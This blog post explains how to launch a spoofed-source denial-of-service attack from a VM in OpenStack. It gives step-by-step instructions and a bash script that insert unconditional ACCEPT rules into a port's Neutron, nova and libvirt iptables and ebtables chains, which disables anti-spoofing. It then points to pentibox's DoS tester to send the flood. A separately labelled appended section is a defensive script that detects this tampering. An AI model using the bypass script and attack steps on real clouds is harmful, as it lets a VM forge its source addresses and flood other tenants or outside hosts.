Constructing a spoofed-source-address attack in OpenStack

The previous post covered the defence; this one briefly describes how to launch a DoS attack with a spoofed source IP from a VM running in OpenStack. The steps are carried out as root on the compute node that hosts the attacking VM, because they disable the anti-spoofing rules that Neutron and nova/libvirt install for that VM's port.

1. Modify the iptables and ebtables rules. For example, if the attacking VM is 100.0.0.17, look up the Neutron port for that address (in this example its ID begins with 091f121f-8) and the rules that were created for it:

In iptables, find the chains whose names contain 091f121f-8: neutron-openvswi-s091f121f-8, neutron-openvswi-i091f121f-8 and neutron-openvswi-o091f121f-8 (the anti-spoofing, ingress and egress security-group chains respectively), plus the nova-instance-xxx chain that belongs to this VM. Insert an unconditional ACCEPT rule at the top of each of them.

In the ebtables nat table, find the chains for 091f121f-8 that libvirt's network filter created for the tap device: I-tap091f121f-8c-arp-ip and I-tap091f121f-8c-ipv4-ip. Insert an ACCEPT rule at the top of each of them as well.

2. Install Ruby and download pentibox.

3. Start pentibox and choose Network tools -> Net DoS Tester -> any of the tests to launch the attack.

If traffic still does not get through after the rules from step 1 are in place, check that the security groups of the source and destination VMs allow it.

Below is the script I wrote; I hope it is useful.

#!/bin/bash
# Usage: ./spoof.sh <VM IP>
# Opens the per-port anti-spoofing and security-group chains that Neutron
# and nova/libvirt create for the VM, so the VM can send packets with a
# forged source address. Run as root on the compute node hosting the VM.
ip=$1
echo "$ip"

# Neutron port ID. The fixed_ips column of `neutron port-list` quotes the
# address, so match the quoted form (100.0.0.17 must not match 100.0.0.170).
id=$(neutron port-list | grep -F "\"$ip\"" | awk '{print $2}' | head -n 1)
echo "$id"
if [ -z "$id" ]
then
echo "id null"
exit 1
fi

# iptables chain names use the first 10 characters of the port ID; the tap
# device name (and therefore the ebtables chains) uses the first 11.
itid=$(expr substr "$id" 1 10)
echo "$itid"
etid=$(expr substr "$id" 1 11)
echo "$etid"

# nova-instance-* chain for this VM: the target column of the verbose listing
novarule=$(iptables -L -nvx | grep "$ip" | grep nova | awk '{print $3}' | head -n 1)
echo "$novarule"

#clear previous rules (errors are expected when no rule is present yet)
iptables -D neutron-openvswi-s$itid -j ACCEPT 2>/dev/null
iptables -D neutron-openvswi-i$itid -j ACCEPT 2>/dev/null
iptables -D neutron-openvswi-o$itid -j ACCEPT 2>/dev/null
if [ -n "$novarule" ]; then
iptables -D "$novarule" -j ACCEPT 2>/dev/null
fi

ebtables -t nat -D I-tap$etid-arp-ip -j ACCEPT 2>/dev/null
ebtables -t nat -D I-tap$etid-ipv4-ip -j ACCEPT 2>/dev/null

#create rules: an unconditional ACCEPT at position 1 of every chain
iptables -I neutron-openvswi-s$itid -j ACCEPT
iptables -I neutron-openvswi-i$itid -j ACCEPT
iptables -I neutron-openvswi-o$itid -j ACCEPT
if [ -n "$novarule" ]; then
iptables -I "$novarule" -j ACCEPT
fi

ebtables -t nat -I I-tap$etid-arp-ip -j ACCEPT
ebtables -t nat -I I-tap$etid-ipv4-ip -j ACCEPT
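As an added example that is not part of the original post, here is the check I would run on a compute node to tell whether a port's anti-spoofing chain has been neutered the way step 1 does, which is equally useful for verifying that the script above took effect and for catching such tampering from the defensive side. It reads an `iptables -S` dump on standard input. The chain layout it expects (a RETURN for the port's own MAC/IP pair followed by an unconditional DROP) is that of Neutron's OVS hybrid iptables firewall; the sample dumps, the port ID and the MAC address in them are constructed for the demonstration.

```bash
#!/bin/bash
# Added example, not from the original post: detect whether the per-port
# anti-spoofing chain that step 1 neuters has been tampered with.
#
# Neutron's OVS hybrid firewall creates, for each port, the chain
# neutron-openvswi-s<first 10 chars of port id>. Its normal contents are a
# RETURN for each of the port's own MAC/IP pairs followed by an unconditional
# DROP. An unconditional ACCEPT at the top (what the post's script inserts) or
# a missing DROP lets the VM forge its source address.
#
# Usage on a compute node (root is needed for iptables):
#   iptables -S | check_antispoof_bypass "$(port_prefix "$PORT_ID")"

# First 10 characters of a Neutron port UUID, as used in the iptables chain names.
port_prefix() {
    printf '%s' "$1" | cut -c1-10
}

# Tap device name for a port: "tap" plus the first 11 characters of the UUID.
tap_name() {
    printf 'tap%s' "$(printf '%s' "$1" | cut -c1-11)"
}

# Reads an `iptables -S` dump on stdin. Prints OK, BYPASSED or MISSING and
# returns 0, 2 or 1 respectively.
check_antispoof_bypass() {
    local prefix="$1"
    local chain="neutron-openvswi-s${prefix}"
    local rules first
    # Keep only this chain's rules, in the order iptables evaluates them.
    rules=$(grep "^-A ${chain} " || true)
    if [ -z "$rules" ]; then
        echo MISSING
        return 1
    fi
    first=$(printf '%s\n' "$rules" | head -n 1)
    # Rule 1 is an unconditional ACCEPT: every source address passes.
    if [ "$first" = "-A ${chain} -j ACCEPT" ]; then
        echo BYPASSED
        return 2
    fi
    # The chain must still end in the DROP that catches unmatched sources.
    if ! printf '%s\n' "$rules" | grep -q "^-A ${chain} -j DROP$"; then
        echo BYPASSED
        return 2
    fi
    echo OK
    return 0
}

# Constructed sample dumps (port prefix and MAC address are made up).
SAMPLE_OK='-N neutron-openvswi-s091f121f-8
-A neutron-openvswi-s091f121f-8 -s 100.0.0.17/32 -m mac --mac-source FA:16:3E:00:11:22 -j RETURN
-A neutron-openvswi-s091f121f-8 -j DROP'

SAMPLE_BYPASSED='-N neutron-openvswi-s091f121f-8
-A neutron-openvswi-s091f121f-8 -j ACCEPT
-A neutron-openvswi-s091f121f-8 -s 100.0.0.17/32 -m mac --mac-source FA:16:3E:00:11:22 -j RETURN
-A neutron-openvswi-s091f121f-8 -j DROP'

# Demonstration on the constructed dumps when run directly.
echo "untouched chain: $(printf '%s\n' "$SAMPLE_OK" | check_antispoof_bypass 091f121f-8)"
echo "chain after step 1: $(printf '%s\n' "$SAMPLE_BYPASSED" | check_antispoof_bypass 091f121f-8)"
```

The same idea applies to the ebtables side: `ebtables -t nat -L I-$(tap_name "$PORT_ID")-arp-ip` should not start with an unconditional ACCEPT either.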
